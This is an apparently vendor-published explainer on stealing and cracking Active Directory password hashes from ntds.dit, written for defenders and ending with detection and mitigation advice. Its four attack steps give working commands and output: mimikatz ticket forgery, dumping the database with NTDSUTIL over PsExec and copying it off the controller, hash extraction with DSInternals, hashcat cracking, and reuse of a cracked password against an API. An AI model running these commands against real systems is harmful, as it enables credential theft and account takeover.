Ntds.dit Password Extraction

Ntds.dit Password Extraction

All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller. Amongst other kinds of information, “the dit” contains user accounts and their password hashes, which can be used by an adversary in other stages of their attack. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently share passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers, and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see Golden Ticket) so even older backups can be useful.

Threat Summary

Target:

Active Directory

ATT&CKĀ® Tactic:

ATT&CK Technique:

Difficulty

Detection:

Medium

Mitigation:

Medium

Response:

Hard

NTDS.dit Password Extraction

Hover to see each step

Step 1: An adversary must possess access to a domain controller’s file system before they are able to extract ntds.dit. As this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised domain controller computer account’s password hash to create a silver ticket.

PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User      : FakeUser1
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-441320023-234525631-506766575
User Id   : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service   : HOST
Target    : DC1.domain.com
Lifetime  : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
 
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
 
# A new command prompt window opens
C:\Windows\System32> 

Step 2: Next, with access to a domain controller’s file system, the adversary can exfiltrate ntds.dit and the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. While running, Active Directory maintains a file system lock on the ntds.dit file, which means simply attempting to copy it will fail. There are multiple ways around this constraint, however: 1) an adversary may simply stop Active Directory, though this is likely to get them detected; 2) use the Volume Shadow Copy Service (VSS) to snapshot the volume, and extract ntds.dit from the snapshot; 3) Use buit-in tools like NTDSUtil.exe or DSDBUtil.exe; or, 4) use PowerShell tools like PowerSploit’s Invoke-NinjaCopy.

PS> .\PSExec.exe \\dc1.domain.com cmd
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
     Target Database: S:\Files\Active Directory\ntds.dit
 
                  Defragmentation  Status (omplete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
 
DC1 > Copy S:\Files \\wks2\Share

Step 3: Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run the brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.

$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
 
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Hashdump.txt
 
 
PS> Get-Content C:\Hashdump.txt
 
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #

Step 4: Now that the adversary has acquired password hashes, they are able to put them to use. They could use the hashes themselves in pass-the-hash attacks within the environment (perhaps as a means of persistence), but more likely they will seek to crack these passwords for use in credential stuffing attacks against non-domain joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.

PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
 
852e811a65d732c83214b4ff705d777a:F8qN47F1
 
PS>   # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS>   $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS>   $Password = "F8qN47F1" # This is the password copied from the cracked.txt
PS>   $Object = New-Object -TypeName psobject
PS>   $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS>   $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS>   $url = "https://service.url/api/login"
PS>   $body = $Object | ConvertTo-Json
PS>   $Header = @{ "accept" = "text/json"}
PS>   $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
 
PS>   $Headers = @{ 'Authorization' = "Bearer $Response" }
PS>   $url = "https://service.url/api/DoThings"
PS>   $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS>   $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate, and Respond

Difficulty: Medium

Detecting attempts to access ntds.dit is possible using the Windows event log. Event ID 4663 and 4656 of the Audit File System subcategory, can be to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.

Difficulty: Medium

To mitigate the risk of password extraction from ntds.dit, one must ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place.

  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers. All infrastructure on which domain controllers run (e.g. ESX and attached storage) or applications service domain controllers (e.g. backup solutions) must at the same security level as domain controllers themselves.
  • The physical security of the computers running domain controllers is also important. In areas where physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.

Difficulty: Hard

If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed (i.e. the krbtgt secret was also compromised).

  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.